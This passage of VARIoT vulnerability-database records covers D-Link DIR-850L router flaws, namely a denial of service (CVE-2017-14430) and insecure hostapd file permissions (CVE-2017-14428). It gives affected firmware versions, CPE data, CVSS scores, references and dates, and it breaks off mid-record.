        "id": "JVNDB-2017-008138"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "trust management problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-576"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0601

Vulnerability from variot - Updated: 2023-12-18 13:48

D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices allow remote attackers to cause a denial of service (daemon crash) via crafted LAN traffic. The D-Link DIR-850L device firmware contains an input validation vulnerability that may result in a denial of service (DoS). D-Link DIR-850L REV. A and REV. B are both D-Link wireless router products. The vulnerability affects REV. A devices running firmware FW114WWb07_h2ab_beta1 and earlier, and REV. B devices running firmware FW208WWb02 and earlier. Note that the CVSS vectors in the record below rate the attack vector as Network (AV:N), although the description names crafted LAN traffic as the trigger; weigh the score against how exposed the LAN side is in a given deployment.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0601",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab_beta1"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "rev.b \u003c=fw208wwb02",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw208wwb02"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-33063"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008104"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14430"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-565"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "fw114wwb07_h2ab",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "fw208wwb02",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14430"
      }
    ]
  },
  "cve": "CVE-2017-14430",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 5.0,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2017-14430",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-33063",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-105152",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2017-14430",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14430",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-33063",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-565",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105152",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-33063"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105152"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008104"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14430"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-565"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices allow remote attackers to cause a denial of service (daemon crash) via crafted LAN traffic. The D-Link DIR-850L device firmware contains an input validation vulnerability that may result in a denial of service (DoS). D-Link DIR-850L REV. A and REV. B are both D-Link wireless router products. The vulnerability affects REV. A devices running firmware FW114WWb07_h2ab_beta1 and earlier, and REV. B devices running firmware FW208WWb02 and earlier.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14430"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-33063"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105152"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14430",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008104",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-565",
        "trust": 0.7
      },
      {
        "db": "EXPLOITALERT",
        "id": "27497",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-33063",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105152",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-33063"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105152"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008104"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14430"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-565"
      }
    ]
  },
  "id": "VAR-201709-0601",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-33063"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105152"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-33063"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:48:30.016000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "D-Link DIR-850L REV.A  and REV.B Security vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=234999"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008104"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-565"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105152"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008104"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14430"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14430"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14430"
      },
      {
        "trust": 0.6,
        "url": "http://www.exploitalert.com/view-details.html?id=27497"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-33063"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105152"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008104"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14430"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-565"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-33063"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105152"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008104"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14430"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-565"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-11-08T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-33063"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105152"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008104"
      },
      {
        "date": "2017-09-13T17:29:00.900000",
        "db": "NVD",
        "id": "CVE-2017-14430"
      },
      {
        "date": "2017-09-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-565"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-11-08T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-33063"
      },
      {
        "date": "2017-09-20T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105152"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008104"
      },
      {
        "date": "2023-11-17T20:01:41.363000",
        "db": "NVD",
        "id": "CVE-2017-14430"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-565"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-565"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Vulnerability related to input validation in device firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008104"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-565"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0599

Vulnerability from variot - Updated: 2023-12-18 13:43

D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0666 /var/run/hostapd* permissions (mode 0666 makes these files readable and writable by any local user). The D-Link DIR-850L device firmware contains vulnerabilities related to authorization, permissions, and access control. Information may be obtained or altered, and service operation may be disrupted (DoS). D-Link DIR-850L REV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in REV.A devices using FW114WWb07_h2ab_beta1 and earlier firmware and in REV.B devices using FW208WWb02 and earlier firmware. An attacker could exploit this vulnerability to obtain a wireless password.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0599",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab_beta1"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "rev.b \u003c=fw208wwb02",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw208wwb02"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31798"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008103"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14428"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-567"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "fw114wwb07_h2ab",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "fw208wwb02",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14428"
      }
    ]
  },
  "cve": "CVE-2017-14428",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 2.1,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2017-14428",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "CNVD-2017-31798",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.6,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "VHN-105149",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-14428",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14428",
            "trust": 1.8,
            "value": "HIGH"
